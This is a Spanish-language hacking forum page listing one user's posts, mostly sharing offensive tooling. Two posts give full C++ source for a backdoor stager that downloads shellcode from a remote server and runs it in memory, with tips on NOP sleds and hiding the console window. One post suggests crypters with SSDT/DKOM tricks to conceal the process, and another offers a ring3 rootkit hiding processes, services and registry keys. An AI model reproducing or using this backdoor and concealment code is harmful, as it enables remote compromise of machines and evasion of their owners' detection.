Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - StevenKhooks

#1
Hola a todos tengo un problema al compilar el siguiente codigo en C++ a autoit



    //include library wininet this have a funtions InternetOpen(),InternetOpenUrl(),InternetReadFile(),InternetCloseHandle(),
    #include <windows.h>
    #include<iostream>
    #include<cstring>
    #include<Wininet.h>
    using namespace std;
    //this is a buffer with shellcode data in .bss section
    unsigned char DataReceived[500];
    int main(){
        int i;
        //this configure a HTTP agent to surf
      HINTERNET connect = InternetOpen("MyBrowser",INTERNET_OPEN_TYPE_PRECONFIG,NULL, NULL, 0);
        //if for validate connection.
       if(!connect){
          cout<<"Connection Failed or Syntax error";
          return 0;
       }
     //Open a malicious url
    HINTERNET OpenAddress = InternetOpenUrl(connect,"http://192.168.16.2/ascii.bin", NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, 0);
     
     //this check the handler for URL
       if ( !OpenAddress )
       {
          DWORD ErrorNum = GetLastError();
          cout<<"Failed to open URL \nError No: "<<ErrorNum;
          InternetCloseHandle(connect);
          return 0;
       }
     
     
       DWORD NumberOfBytesRead = 0;
       
       //this recovery a file on server and save data into DataReceived
       while(InternetReadFile(OpenAddress, DataReceived, 4096, &NumberOfBytesRead) && NumberOfBytesRead )
       {
       //this print the data in format \x00 you can delete this routine
       for(i=0;i<sizeof DataReceived; i++ ){
                       
                       printf("\\x%02x",DataReceived[i]);
                         
                        }
       /*this routine is a other implementattion of shellcode-test but in this routine i use  __asm () directive for call asm intrucctions.
       1)first i store a pointer to buffer in EAX register
       2)push eax, Pointer to DataReceived in stack now esp point to first 4 bytes of shellcode
       3)the ret instruction put the value of esp+4 into eip and pass the execution.
       4)finally the shellcode in DataReceived is executed
       5)all handler is closed.
       NOTA:
            you can put a nopsled before shellcode for estabilish execution .
            use freeconsole for hidden a Dos Windows
       */
    __asm ("lea _DataReceived, %eax");
    __asm ("push %eax");
    __asm ("ret");
       }
     
       InternetCloseHandle(OpenAddress);
       InternetCloseHandle(connect);
     
       return 0;
    }



#2
.NET (C#, VB.NET, ASP) / Help Gui
16 Junio 2014, 04:32 AM
hola a todos estoy tratando de hacer mi propio GUI pero esta todo terminado el problema es que cuando meto mi codigo no me compila el codigo dentro del nuevo exe que problema me pasa ? alguien que me ayude
#3
Programación C/C++ / C++ Advanced Backdoor
16 Junio 2014, 04:16 AM
Hola a todos les comparto el siguiente video tutorial aqui utilizamos metasploit msfpayload recuerden que donde esta el archivo.bin es el backdoor . ustedes pueden hacerlo con archivos backdoor.exe tambien  :D

//No crea archivos temporales en el sistema
//EL proceso es visto por el administrador de tareas pero se puede ocultar facilmente si lo pasan por un builder o crypter que tenga la opcion SSDT o DKOM para olcultarlo del administrador de tareas y process explorer y muchos mas es la imaginacion


[youtube=640,360]https://www.youtube.com/watch?v=Wj30UBKkkCk[/youtube]

[youtube=640,360]https://www.youtube.com/watch?v=E4ldqdEKxf8[/youtube]




   //include library wininet this have a funtions InternetOpen(),InternetOpenUrl(),InternetReadFile(),InternetCloseHandle(),
   #include <windows.h>
   #include<iostream>
   #include<cstring>
   #include<Wininet.h>
   using namespace std;
   //this is a buffer with shellcode data in .bss section
   unsigned char DataReceived[500];
   int main(){
       int i;
       //this configure a HTTP agent to surf
     HINTERNET connect = InternetOpen("MyBrowser",INTERNET_OPEN_TYPE_PRECONFIG,NULL, NULL, 0);
       //if for validate connection.
      if(!connect){
         cout<<"Connection Failed or Syntax error";
         return 0;
      }
    //Open a malicious url
   HINTERNET OpenAddress = InternetOpenUrl(connect,"http://192.168.16.2/ascii.bin", NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, 0);
   
    //this check the handler for URL
      if ( !OpenAddress )
      {
         DWORD ErrorNum = GetLastError();
         cout<<"Failed to open URL \nError No: "<<ErrorNum;
         InternetCloseHandle(connect);
         return 0;
      }
   
   
      DWORD NumberOfBytesRead = 0;
     
      //this recovery a file on server and save data into DataReceived
      while(InternetReadFile(OpenAddress, DataReceived, 4096, &NumberOfBytesRead) && NumberOfBytesRead )
      {
      //this print the data in format \x00 you can delete this routine
      for(i=0;i<sizeof DataReceived; i++ ){
                     
                      printf("\\x%02x",DataReceived[i]);
                       
                       }
      /*this routine is a other implementattion of shellcode-test but in this routine i use  __asm () directive for call asm intrucctions.
      1)first i store a pointer to buffer in EAX register
      2)push eax, Pointer to DataReceived in stack now esp point to first 4 bytes of shellcode
      3)the ret instruction put the value of esp+4 into eip and pass the execution.
      4)finally the shellcode in DataReceived is executed
      5)all handler is closed.
      NOTA:
           you can put a nopsled before shellcode for estabilish execution .
           use freeconsole for hidden a Dos Windows
      */
   __asm ("lea _DataReceived, %eax");
   __asm ("push %eax");
   __asm ("ret");
      }
   
      InternetCloseHandle(OpenAddress);
      InternetCloseHandle(connect);
   
      return 0;
   }

#4
Hola a todos les comparto el siguiente codigo programado en ring3 espero que dure y no se malogre todo el trabajo que se hizo en el lo tenia guardado en privado y  ps decidi compartirlo con todos

aqui una demo :

[youtube=640,360]https://www.youtube.com/watch?v=-Bjf8Ssv4zE[/youtube]

source download : MP

http://pastebin.com/Xae1JGY5

Funcion:

hide a process & windows service from taskmanager
hide a registry key & registry value from regedit